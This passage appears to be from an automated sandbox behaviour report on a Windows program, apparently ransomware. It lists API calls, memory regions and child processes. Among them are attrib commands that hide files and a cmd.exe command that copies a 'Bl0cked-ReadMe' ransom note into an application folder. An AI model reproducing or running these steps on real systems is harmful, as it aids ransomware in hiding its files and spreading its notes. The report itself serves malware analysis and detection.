lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0145.053] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x30eb64, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x30eb64*=0x1a) returned 1 [0145.053] _get_osfhandle (_FileHandle=1) returned 0x7 [0145.053] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0145.053] _get_osfhandle (_FileHandle=1) returned 0x7 [0145.053] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0145.053] _get_osfhandle (_FileHandle=0) returned 0x3 [0145.053] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0145.053] SetConsoleInputExeNameW () returned 0x1 [0145.053] GetConsoleOutputCP () returned 0x1b5 [0145.053] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0145.054] SetThreadUILanguage (LangId=0x0) returned 0x409 [0145.054] exit (_Code=0) Process: id = "199" 
image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16ae0" os_pid = "0x958" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "197" os_parent_pid = "0x954" cmd_line = "attrib -r -s -h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 17457 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 17458 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 17459 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 17460 start_va = 0x1d0000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 17461 start_va = 0x6d0000 end_va = 0x6d6fff entry_point = 0x6d0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 17462 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 17463 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = 
"\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 17464 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 17465 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 17466 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 17467 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 17468 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 17469 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 17470 start_va = 0x1a0000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17471 start_va = 0x2f0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 17472 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 17473 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 17474 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = 
"\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 17475 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 17476 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 17477 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 17478 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 17479 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 17480 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 17481 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 17482 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 17483 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 17484 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 17485 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 17486 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 256 os_tid = 0x98c Process: id = "200" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16ae0" os_pid = "0xb4c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "197" os_parent_pid = "0x954" cmd_line = "attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 17487 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 17488 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 17489 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 17490 start_va = 0x1d0000 
end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 17491 start_va = 0xd00000 end_va = 0xd06fff entry_point = 0xd00000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 17492 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 17493 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 17494 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 17495 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 17496 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 17497 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 17498 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 17499 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 17500 start_va = 0x140000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 17501 start_va = 0x2b0000 end_va = 0x3affff 
entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 17502 start_va = 0x6e2b0000 end_va = 0x6e2ccfff entry_point = 0x6e2b0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 17503 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 17504 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 17505 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 17506 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 17507 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 17508 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 17509 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 17510 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 
0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 17511 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 17512 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 17513 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 17514 start_va = 0x3b0000 end_va = 0x477fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 17515 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 17516 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 257 os_tid = 0x990 Process: id = "201" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16ae0" os_pid = "0xad0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "197" os_parent_pid = "0x954" cmd_line = "attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT 
AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 17593 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 17594 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 17595 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 17596 start_va = 0x130000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 17597 start_va = 0xd90000 end_va = 0xd96fff entry_point = 0xd90000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 17598 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 17599 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 17600 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 17601 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 17602 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 17603 start_va = 0x10000 end_va = 
0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 17604 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 17605 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 17606 start_va = 0x1a0000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17607 start_va = 0x320000 end_va = 0x32ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 17608 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 17609 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 17610 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 17611 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 17612 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 17613 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 
region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 17614 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 17615 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 17616 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 17617 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 17618 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 17619 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 17620 start_va = 0x330000 end_va = 0x3f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 17621 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 17622 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" 
(normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 258 os_tid = 0x988 Process: id = "202" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16e60" os_pid = "0xb2c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 17705 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 17706 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 17707 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 17708 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 17709 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 17710 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" 
(normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 17711 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 17712 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 17713 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 17714 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 17773 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 17774 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 17775 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 17776 start_va = 0x2c0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 17777 start_va = 0x3a0000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 17778 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 17779 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" 
(normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 17780 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 17781 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 17782 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 17783 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 17784 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 17785 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 17786 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 17787 start_va = 0x1d0000 end_va = 0x297fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 17788 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 17789 start_va = 0x76ca0000 end_va = 
0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 17790 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 17791 start_va = 0x2a0000 end_va = 0x2a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17792 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 17793 start_va = 0x2d0000 end_va = 0x2d0fff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 17794 start_va = 0x4a0000 end_va = 0x5a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 17795 start_va = 0x5b0000 end_va = 0x11affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 17796 start_va = 0x11b0000 end_va = 0x1312fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011b0000" filename = "" Thread: id = 262 os_tid = 0x968 [0146.103] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cfcbc | out: lpSystemTimeAsFileTime=0x1cfcbc*(dwLowDateTime=0x91036320, dwHighDateTime=0x1d440a9)) [0146.103] GetCurrentProcessId () returned 0xb2c [0146.103] GetCurrentThreadId () returned 0x968 [0146.103] GetTickCount () returned 0x2d7a8 [0146.103] QueryPerformanceCounter (in: lpPerformanceCount=0x1cfcb4 | out: lpPerformanceCount=0x1cfcb4*=20289218786) returned 1 [0146.103] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0146.104] __set_app_type (_Type=0x1) [0146.104] __p__fmode () returned 0x76b331f4 [0146.104] __p__commode () returned 0x76b331fc [0146.104] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 
